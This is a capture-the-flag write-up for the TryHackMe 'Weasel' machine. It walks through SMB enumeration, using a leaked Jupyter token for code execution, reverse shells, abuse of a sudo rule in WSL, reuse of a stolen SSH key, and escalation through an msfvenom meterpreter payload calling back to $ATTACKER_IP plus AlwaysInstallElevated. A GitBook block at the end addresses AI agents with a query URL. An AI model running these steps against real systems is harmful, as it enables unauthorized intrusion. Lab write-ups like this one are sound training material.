# Weasel {% embed url="" %} ### Phase 1 - Reconnaisance First, we start with an `nmap` scan:

Full scan

``` ┌─[root@edu-virtualbox]─[/home/edu/THM/weasel] └──╼ #cat scan.txt Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 21:40 CEST Nmap scan report for 10.10.186.146 Host is up (0.028s latency). Not shown: 65520 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA) | 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA) |_ 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: DEV-DATASCI-JUP | NetBIOS_Domain_Name: DEV-DATASCI-JUP | NetBIOS_Computer_Name: DEV-DATASCI-JUP | DNS_Domain_Name: DEV-DATASCI-JUP | DNS_Computer_Name: DEV-DATASCI-JUP | Product_Version: 10.0.17763 |_ System_Time: 2023-05-19T19:41:58+00:00 | ssl-cert: Subject: commonName=DEV-DATASCI-JUP | Not valid before: 2023-03-12T11:46:50 |_Not valid after: 2023-09-11T11:46:50 |_ssl-date: 2023-05-19T19:42:06+00:00; +3s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8888/tcp open http Tornado httpd 6.0.3 |_http-server-header: TornadoServer/6.0.3 | http-title: Jupyter Notebook |_Requested resource was /login?next=%2Ftree%3F | http-robots.txt: 1 disallowed entry |_/ 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=5/19%OT=22%CT=1%CU=36243%PV=Y%DS=2%DC=T%G=Y%TM=6467D10 OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS= OS:U)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS OS:%O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y% OS:DF=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD= OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD= OS:Z) Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2023-05-19T19:41:59 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_clock-skew: mean: 2s, deviation: 0s, median: 2s TRACEROUTE (using port 993/tcp) HOP RTT ADDRESS 1 23.98 ms 10.8.0.1 2 24.70 ms 10.10.186.146 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 122.98 seconds ┌ ```

So we have an SMB server, a HTTP server, an RDP server, an SSH server and an unknown server on port `5985`. #### SMB Let's see what's in the SMB server first. We use `smbclient` for this:

So there's an open `datasci-team` share. This means we use an empty password. Let's see what's inside:

Let's get all the files. In SMBClient, the most efficient way is by turning prompts off, recurse on and using the mask-get (`mget`) command: ``` prompt OFF recurse ON mget * ```

We find a Jupyter-token in the `/misc` directory:

#### HTTP On port 8888, we find a `Jupyter` webserver, where we can use the token we found:

After we press the "Log in" button, we get access to a Jupyter portal:

From here, we should be able to get RCE. First, we make a new `Python 3` notebook: ![](/files/bIb7yG8u5x11XrNsADV9) In Jupyter, you can run system commands by using ``` !SYSTEM_COMMAND ``` So we enter the command `id`, and then we press the `run` button at the top:

Before getting a reverse shell, we need to set up a listener using `netcat`: ![](/files/oD3s5OcWzJaWRJtgyVFR) From the `uid`, it becomes clear this is a linux environment, so we'll use a linux reverse shell from revshells.com:

After pressing `run`, we get a connection back: ![](/files/MOIzn7h19sSFUDiTTq6Y) ### Phase 2 - Initial access First, we stabilize our shell: ``` // Control - Z stty raw -echo fg // Enter stty rows 52 cols 238 export TERM=xterm ```

After looking around a bit in the user's home directory, it seems we are in a `wsl` (linux subsystem for windows) container. The `wslu` is a common utilities program (WSL-utilities)

Rabbithole (getting root on WSL)

Now that we have a shell, let's check `sudo -l`:

The `/home/dev-datasci/.local/bin/jupyter` seems very vulnerable, because we can run a file we own as root.

It seems there is no `jupyter`-file in here, so let's make one:

And we have root on the linux box.

We find a private SSH key for a "lowpriv" user: ![](/files/R5e8loGQEoyH88K2aGIU) We copy this back to our machine, and save it:

we can use it by connecting the the SSH using this command: ``` ssh -i ID_RSA_FILE dev-datasci-lowprive@IP_ADDRESS ```

And we have an SSH shell on the system. After connecting, we can find the `user.txt`:

### Phase 3 - privilege escalation We will be using Powershell for this phase, as it has some handy features:

Let's get `winpeas.exe` on the system: First, we open a `python3` server on our attacking machine:

Then, we install it to the system and run it:

We can check the log using ``` cat winlog.txt | Out-Host -paging ``` ![](/files/2jIylvAUqHCErDflHrRQ) #### Final exploit So we're dealing with a 64-bit architecture. To exploit this vulnerability, we need to use an "interactive" session. This means the session needs to have a GUI attached, as the `msiexec.exe` needs a GUI to run correctly. \ For this to work, we'll need to do some process migration.\ So let's boot up `msfconsole` and get to work: First, we use `msfvenom` to generate a `meterpreter` reverse shell:

```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f exe -o meterpreter_reverse.exe ``` {% hint style="info" %} Make sure to replace the $ATTACKER\_IP with your TryHackMe VPN IP {% endhint %} To get it on the target system, we use the `SimpleHTTPServer` module of `python3`:

Before running the exploit, we create a listener:

Then, we download the reverse shell and execute it:

And we get our `meterpreter` shell back:

Let's check the `process-id`, and the `ps` :

Our process is `892`, which has the Parent-PID of `1036`(`powershell.exe`), which has the Parent-PID of `3892`(cmd.exe). Under the `Session` tab, you can see it's Session 0:

This means that the process is not interactive (session 0), so the `msi` exploit won't work.\ So we need to migrate it to a Session-1 type process. For example, `svchost.exe` on PID 2612 is a Session-1 type process, so let's try:

Then, we background the shell and use the `AlwaysInstallElevated` MSF exploit:

Next, we configure the payload:\ We use session 13, because we backgrounded it in the screenshot above.

Then, we run it, and get root:

For `root.txt`:

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eduw.gitbook.io/writeups/weasel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.